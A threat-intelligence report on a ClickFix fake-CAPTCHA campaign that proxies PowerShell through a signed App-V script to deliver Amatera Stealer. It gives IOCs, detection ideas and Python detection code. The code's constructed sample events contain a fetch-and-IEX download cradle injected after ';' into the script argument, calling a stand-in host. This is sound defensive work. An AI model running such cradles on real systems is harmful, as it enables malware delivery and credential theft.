Industry researchers identified a sophisticated fake CAPTCHA campaign that uses a signed Microsoft Application Virtualization (App-V) script, SyncAppvPublishingServer.vbs, as a LOLBin to proxy execution through legitimate Windows components. The attack begins with ClickFix, a social-engineering prompt framed as a human verification check that instructs the user to paste a command into the Run dialog and execute it. Rather than launching PowerShell directly, the pasted command invokes the signed script, which in turn spawns PowerShell; this sidesteps detections keyed on a user-launched PowerShell process and, as a side effect, filters out lower-value systems, since the App-V client components are present only on Enterprise and Education editions of Windows.
The campaign employs multiple execution gates and validation checks throughout its progression, including inspecting clipboard contents and environment variables to confirm that stages run in the intended order and that a real user interacted with the prompt. The chain pulls live configuration from a public Google Calendar (.ics) file, letting the operators change delivery parameters without redeploying earlier stages. Later stages use PNG-based steganography: encrypted payloads hidden inside images are extracted and executed entirely in memory, with nothing written to disk. The chain ultimately delivers Amatera Stealer, a well-known information-stealing malware family that uses layered encryption, evasive networking techniques, and modular tasking. For command and control, the malware spoofs the HTTP Host header and issues direct syscalls instead of calling the standard Windows networking libraries, sidestepping the user-mode hooks EDR products place on those libraries.
IOCs (21)

Domain (6)
- cdn.jsdelivr.net
- sec-t2.fainerkern.ru
- svc-int-api-identity-token-issuer-v2-mn.in.net
- gcdnb.pbrd.co
- iili.io
- s6.imgcdn.dev
Several of these are public CDN and image-hosting services (cdn.jsdelivr.net, iili.io); treat them as hunting pivots in proxy logs rather than block-list entries.

IP address (1)
- 212.34.138.4

SHA256 file hash (8)
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

File name (6)
- herf54basic.ics
- qhs9hr5gPqez.png
- fOa2bcJ.png
- YzkCM2.png
- SyncAppvPublishingServer.vbs

Detections
- Suspicious Scripted Retrieval of ICS Calendar Files
- PowerShell Execution via WScript with WinINet Load
- Execution of WScript App-V Publishing script to proxy execution to PowerShell
- Detect payloads hidden in image files via steganography — look for image downloads followed by script execution
- Monitor signed Windows binaries used to proxy execution of untrusted code (LOLBins)
- Detect reflective DLL injection or in-memory assembly loading without disk writes
- Flag suspicious PowerShell execution — encoded commands, download cradles, or AMSI bypass
- Detect encrypted C2 channels using non-standard certificates or pinned connections
- Detect malware resolving C2 addresses from public web services (pastebins, calendars, DNS TXT)
- Alert when users execute files downloaded from the internet lacking Mark-of-the-Web
- Alert on execution that checks for specific environment conditions before proceeding
- Flag network traffic using protocol impersonation to disguise C2 communications
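As an added example (not code from the original page or from the researchers' report), the Python below implements the first three, App-V-specific detections in the list above and runs them over constructed Sysmon-style process-creation records that mirror the chain described at the top of the page: ClickFix paste into Run, the signed script proxying into PowerShell, and the scripted pull of the calendar file. It assumes the documented argument-injection behaviour of SyncAppvPublishingServer.vbs, namely that the script's single argument is placed inside a PowerShell -Command string, so everything after the first ';' in that argument runs as arbitrary PowerShell. The event records, file paths, `*.example.invalid` URLs and rule names are constructed for illustration, and the PowerShell command line the script builds is approximated rather than copied from the script.

```python
"""Detect the SyncAppvPublishingServer.vbs -> PowerShell proxy chain in
Sysmon-style process-creation events (Event ID 1 fields, already parsed).

Added example; the events below are constructed, not captured telemetry.
Assumption: the .vbs passes its single argument into a PowerShell -Command
string, so anything after the first ';' in that argument runs as PowerShell.
"""
import re
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
APPV_VBS = "syncappvpublishingserver.vbs"

# Argument handed to the .vbs: the first quoted or bare token after the script path.
APPV_ARG_RE = re.compile(r'syncappvpublishingserver\.vbs"?\s+(?:"([^"]*)"|(\S+))', re.I)
# Download-cradle vocabulary typical of ClickFix one-liners.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|frombase64string", re.I)
# A script pulling an iCalendar file over HTTP(S).
ICS_URL_RE = re.compile(r"""https?://[^\s"']+\.ics\b""", re.I)


def image_name(path: str) -> str:
    """Lower-cased basename of an Image/ParentImage path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def appv_injected_tail(cmdline: str) -> Optional[str]:
    """PowerShell text smuggled after ';' in the .vbs argument, or None.

    A legitimate publishing refresh passes a bare server name (or 'n') with no
    ';', so it returns None; a ClickFix command returns the proxied payload.
    """
    m = APPV_ARG_RE.search(cmdline)
    if not m:
        return None
    arg = m.group(1) if m.group(1) is not None else m.group(2)
    if ";" not in arg:
        return None
    tail = arg.split(";", 1)[1].strip()
    return tail or None


def analyze(events):
    """Return (rule, UtcTime, detail) tuples for the three chain stages."""
    findings = []
    for ev in events:
        img = image_name(ev["Image"])
        parent = image_name(ev.get("ParentImage", ""))
        cmd = ev["CommandLine"]
        pcmd = ev.get("ParentCommandLine", "")

        # Stage 1: script host launching the signed App-V script with a ';' payload.
        if img in SCRIPT_HOSTS:
            tail = appv_injected_tail(cmd)
            if tail:
                findings.append(("appv_vbs_argument_injection", ev["UtcTime"], tail))

        # Stage 2: PowerShell child of that script host whose command line carries a cradle.
        if img in POWERSHELL and parent in SCRIPT_HOSTS and APPV_VBS in pcmd.lower():
            hit = CRADLE_RE.search(cmd)
            if hit:
                findings.append(("appv_proxied_powershell_cradle", ev["UtcTime"], hit.group(0)))

        # Stage 3: any script host or PowerShell retrieving an .ics calendar file.
        if img in POWERSHELL or img in SCRIPT_HOSTS:
            hit = ICS_URL_RE.search(cmd)
            if hit:
                findings.append(("scripted_ics_retrieval", ev["UtcTime"], hit.group(0)))
    return findings


WSCRIPT = r"C:\Windows\System32\wscript.exe"
APPV_PATH = r"C:\Windows\System32\SyncAppvPublishingServer.vbs"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CRADLE = "(New-Object Net.WebClient).DownloadString('https://stage.example.invalid/s1.txt')|IEX"

# Constructed events (not real telemetry): three chain stages plus two benign controls.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-01-01 10:00:00", "Image": WSCRIPT, "ParentImage": EXPLORER,
     "ParentCommandLine": "explorer.exe",
     "CommandLine": f'"{WSCRIPT}" "{APPV_PATH}" "n;{CRADLE}"'},            # pasted into Run
    {"UtcTime": "2025-01-01 10:00:01", "Image": PS, "ParentImage": WSCRIPT,
     "ParentCommandLine": f'"{WSCRIPT}" "{APPV_PATH}" "n;{CRADLE}"',
     "CommandLine": "powershell.exe -ExecutionPolicy ByPass -WindowStyle Hidden "
                    f'-Command "Import-Module AppvClient;Sync-AppvPublishingServer n;{CRADLE}"'},
    {"UtcTime": "2025-01-01 10:00:05", "Image": PS, "ParentImage": PS,
     "ParentCommandLine": "powershell.exe -ExecutionPolicy ByPass -WindowStyle Hidden ...",
     "CommandLine": "powershell.exe -NoP -W Hidden -c \"$cfg=Invoke-WebRequest "
                    "'https://calendar.example.invalid/ical/basic.ics' -UseBasicParsing\""},
    {"UtcTime": "2025-01-01 11:00:00", "Image": WSCRIPT, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe",
     "CommandLine": f'"{WSCRIPT}" "{APPV_PATH}" "n"'},                     # legitimate refresh
    {"UtcTime": "2025-01-01 11:05:00", "Image": PS, "ParentImage": EXPLORER,
     "ParentCommandLine": "explorer.exe", "CommandLine": "powershell.exe Get-Service"},
]

if __name__ == "__main__":
    for rule, when, detail in analyze(SAMPLE_EVENTS):
        print(f"{when}  {rule}: {detail}")
```

The ';' check in `appv_injected_tail` is what separates a genuine App-V publishing refresh from the ClickFix abuse on hosts where App-V is actually in use, so it should stay even where the script host rule is otherwise noisy. The stage-3 rule only sees URLs that appear in plain text on the command line; a stage that uses -EncodedCommand or fetches the URL from a variable will not match, so pair it with proxy or DNS logs for the calendar domain rather than relying on process telemetry alone.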